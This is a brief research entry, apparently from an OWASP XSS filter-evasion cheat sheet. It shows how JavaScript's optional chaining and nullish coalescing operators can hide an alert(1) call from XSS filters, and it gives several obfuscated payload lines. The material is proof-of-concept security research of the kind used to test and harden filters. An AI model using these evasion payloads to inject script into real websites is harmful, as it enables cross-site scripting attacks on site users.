OWASP XSS Filter Evasion Cheat Sheet - Filter Bypass Alert Obfuscation of Mixed Technique Obfuscation

Click to execute alert(1);

JavaScript source code: x=this?.[[]?.x??/a/.source+'\x6c'+13439..toString?.(30)],[1]?.findIndex?.(x);

Simple code

([]?.x??alert)(1);

This is equivalent to alert(1);.

New technique

This is a technique that combines the optional chaining operator (?.) and the Null coalescing operator (??).
Although it is not the original usage, it is possible to execute the functions or properties by intentionally returning undefined.
For example, code like "object?.undefined??function".
That is, the JavaScript code "this?.[[]?.x??/alert/.source]?.(1);" is equivalent to alert(1);.

Research report by Tsubasa FUJII(@reinforchu).